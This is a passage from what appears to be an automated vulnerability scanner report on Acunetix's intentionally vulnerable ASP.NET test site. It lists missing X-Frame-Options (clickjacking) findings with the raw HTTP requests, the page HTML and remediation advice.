          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), then you'll want to use SAMEORIGIN; otherwise, if you never expect the page to be framed, you should use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        8. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        9. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
